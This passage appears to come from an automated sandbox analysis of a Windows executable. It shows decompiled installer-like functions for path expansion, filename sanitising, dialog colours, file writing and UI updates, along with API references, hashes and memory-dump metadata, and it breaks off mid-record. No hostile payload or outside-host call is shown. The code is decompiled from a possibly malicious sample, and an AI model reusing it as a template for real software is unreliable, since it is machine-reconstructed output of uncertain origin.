                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                            • String ID: ]_$%s=%s$[Rename]
                                            • API String ID: 3445103937-1354896504
                                            • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                            • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                            • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                            • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x5fd5fe
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x5fbaf8
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x73951340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























                                            0x00405be9
                                            0x00405be9
                                            0x00405be9
                                            0x00405bef
                                            0x00405bf4
                                            0x00405bf6
                                            0x00405c05
                                            0x00405c05
                                            0x00405c07
                                            0x00405c10
                                            0x00405c12
                                            0x00405c17
                                            0x00405c1a
                                            0x00405c1b
                                            0x00405c22
                                            0x00405c24
                                            0x00405c2a
                                            0x00405c2d
                                            0x00405c2d
                                            0x00405e06
                                            0x00405e06
                                            0x00405e0a
                                            0x00000000
                                            0x00000000
                                            0x00405c3a
                                            0x00405c40
                                            0x00000000
                                            0x00000000
                                            0x00405c46
                                            0x00405c47
                                            0x00405c4a
                                            0x00405c4d
                                            0x00405df9
                                            0x00405e03
                                            0x00405e05
                                            0x00405e05
                                            0x00405dfb
                                            0x00405dfd
                                            0x00405dff
                                            0x00405e00
                                            0x00405e00
                                            0x00000000
                                            0x00405df9
                                            0x00405c53
                                            0x00405c57
                                            0x00405c67
                                            0x00405c6b
                                            0x00405c72
                                            0x00405c75
                                            0x00405c79
                                            0x00405c7f
                                            0x00405c82
                                            0x00405c85
                                            0x00405c88
                                            0x00405da3
                                            0x00405da6
                                            0x00405dd6
                                            0x00405dd9
                                            0x00405dde
                                            0x00405de2
                                            0x00405de2
                                            0x00405de7
                                            0x00405de8
                                            0x00405ded
                                            0x00405df0
                                            0x00405df2
                                            0x00000000
                                            0x00405df2
                                            0x00405da8
                                            0x00405dab
                                            0x00405dc0
                                            0x00405dc7
                                            0x00405dad
                                            0x00405db4
                                            0x00405db4
                                            0x00405dcf
                                            0x00405dd2
                                            0x00405d9b
                                            0x00405d9c
                                            0x00405d9c
                                            0x00000000
                                            0x00405dd2
                                            0x00405c90
                                            0x00405c91
                                            0x00405c97
                                            0x00405c99
                                            0x00405cb3
                                            0x00405cb3
                                            0x00405cba
                                            0x00405cba
                                            0x00405cc1
                                            0x00405cc5
                                            0x00405cc5
                                            0x00405cc6
                                            0x00405cc8
                                            0x00405d01
                                            0x00405d04
                                            0x00405d14
                                            0x00405d17
                                            0x00405d1f
                                            0x00405d25
                                            0x00405d25
                                            0x00405d81
                                            0x00405d81
                                            0x00405d83
                                            0x00000000
                                            0x00000000
                                            0x00405d29
                                            0x00405d30
                                            0x00405d31
                                            0x00405d33
                                            0x00405d4d
                                            0x00405d5b
                                            0x00405d61
                                            0x00405d63
                                            0x00405d7e
                                            0x00405d7e
                                            0x00405d7e
                                            0x00000000
                                            0x00405d7e
                                            0x00405d69
                                            0x00405d74
                                            0x00405d7a
                                            0x00405d7c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d7c
                                            0x00405d35
                                            0x00405d38
                                            0x00000000
                                            0x00000000
                                            0x00405d47
                                            0x00405d49
                                            0x00405d4b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d4b
                                            0x00000000
                                            0x00405d81
                                            0x00405d0c
                                            0x00000000
                                            0x00405cca
                                            0x00405ccf
                                            0x00405ce5
                                            0x00405cea
                                            0x00405ced
                                            0x00405d8a
                                            0x00405d8a
                                            0x00405d8e
                                            0x00405d96
                                            0x00405d96
                                            0x00000000
                                            0x00405d8e
                                            0x00405cf7
                                            0x00405d85
                                            0x00405d85
                                            0x00405d88
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d88
                                            0x00405cc8
                                            0x00405c9b
                                            0x00405c9f
                                            0x00000000
                                            0x00000000
                                            0x00405ca1
                                            0x00405ca5
                                            0x00000000
                                            0x00000000
                                            0x00405ca7
                                            0x00405cab
                                            0x00000000
                                            0x00405cad
                                            0x00405cad
                                            0x00000000
                                            0x00405cad
                                            0x00405cab
                                            0x00405e10
                                            0x00405e1a
                                            0x00405e26
                                            0x00405e26
                                            0x00000000

                                            APIs
                                            • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                            • GetSystemDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D0C
                                            • GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
                                            • SHGetSpecialFolderLocation.SHELL32(?,0041CC48), ref: 00405D5B
                                            • SHGetPathFromIDListA.SHELL32(0041CC48,TclpOwkq), ref: 00405D69
                                            • CoTaskMemFree.OLE32(0041CC48), ref: 00405D74
                                            • lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                            • lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-487370903
                                            • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                            • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                            • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                            • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                            0x00405e2b
                                            0x00405e33
                                            0x00405e47
                                            0x00405e47
                                            0x00405e4d
                                            0x00405e5a
                                            0x00405e5a
                                            0x00405e5b
                                            0x00405e5d
                                            0x00405e61
                                            0x00405e63
                                            0x00405e6c
                                            0x00405e6e
                                            0x00405e88
                                            0x00405e90
                                            0x00405e90
                                            0x00405e95
                                            0x00405e97
                                            0x00405e99
                                            0x00405e9d
                                            0x00405e9e
                                            0x00405ea1
                                            0x00405ea9
                                            0x00405eab
                                            0x00405eaf
                                            0x00000000
                                            0x00000000
                                            0x00405eb5
                                            0x00405eba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405eba
                                            0x00405ebf

                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DN_467842234567.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\DN_467842234567.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\DN_467842234567.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2187745734
                                            • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                            • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                            0x00403efc
                                            0x00403f90
                                            0x00000000
                                            0x00403f90
                                            0x00403f0d
                                            0x00403f11
                                            0x00000000
                                            0x00000000
                                            0x00403f17
                                            0x00403f20
                                            0x00403f23
                                            0x00403f23
                                            0x00403f29
                                            0x00403f2f
                                            0x00403f2f
                                            0x00403f3b
                                            0x00403f41
                                            0x00403f48
                                            0x00403f4b
                                            0x00403f4e
                                            0x00403f50
                                            0x00403f50
                                            0x00403f58
                                            0x00403f5e
                                            0x00403f5e
                                            0x00403f68
                                            0x00403f6d
                                            0x00403f70
                                            0x00403f75
                                            0x00403f78
                                            0x00403f78
                                            0x00403f88
                                            0x00403f88
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                            • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                            0x004026af
                                            0x004026b1
                                            0x004026bd
                                            0x004026c0
                                            0x004026ca
                                            0x004026ce
                                            0x004026ce
                                            0x004026d4
                                            0x004026e1
                                            0x004026e9
                                            0x004026ec
                                            0x004026f2
                                            0x00402700
                                            0x00402705
                                            0x00402709
                                            0x0040270c
                                            0x00402715
                                            0x00402721
                                            0x00402725
                                            0x00402728
                                            0x00402732
                                            0x00402751
                                            0x00402739
                                            0x0040273e
                                            0x00402746
                                            0x00402749
                                            0x0040274e
                                            0x0040274e
                                            0x00402758
                                            0x00402758
                                            0x0040276a
                                            0x00402771
                                            0x00402783
                                            0x00402783
                                            0x00402789
                                            0x00402789
                                            0x00402794
                                            0x00402795
                                            0x00402799
                                            0x0040279d
                                            0x004027a3
                                            0x004027a3
                                            0x004027aa
                                            0x00402197
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                            • GlobalFree.KERNEL32 ref: 00402758
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                            • GlobalFree.KERNEL32 ref: 00402771
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                            • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                            • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                            • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                            0x00404eb9
                                            0x00404ec5
                                            0x00404ec8
                                            0x00404ece
                                            0x00404eda
                                            0x00404edd
                                            0x00404ee0
                                            0x00404ee6
                                            0x00404ee6
                                            0x00404eec
                                            0x00404ef4
                                            0x00404ef7
                                            0x00404f14
                                            0x00404f18
                                            0x00404f21
                                            0x00404f21
                                            0x00404f2b
                                            0x00404f34
                                            0x00404f40
                                            0x00404f47
                                            0x00404f4b
                                            0x00404f4e
                                            0x00404f61
                                            0x00404f6f
                                            0x00404f6f
                                            0x00404f73
                                            0x00404f75
                                            0x00404f78
                                            0x00000000
                                            0x00404f78
                                            0x00404ef9
                                            0x00404f01
                                            0x00404f09
                                            0x00404f0f
                                            0x00000000
                                            0x00404f0f
                                            0x00404f09
                                            0x00404ef7
                                            0x00404f82

                                            APIs
                                            • lstrlenA.KERNEL32(00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                            • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                            • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,73BCEA30), ref: 00404F0F
                                            • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                            • SendMessageA.USER32 ref: 00404F47
                                            • SendMessageA.USER32 ref: 00404F61
                                            • SendMessageA.USER32 ref: 00404F6F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                            • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
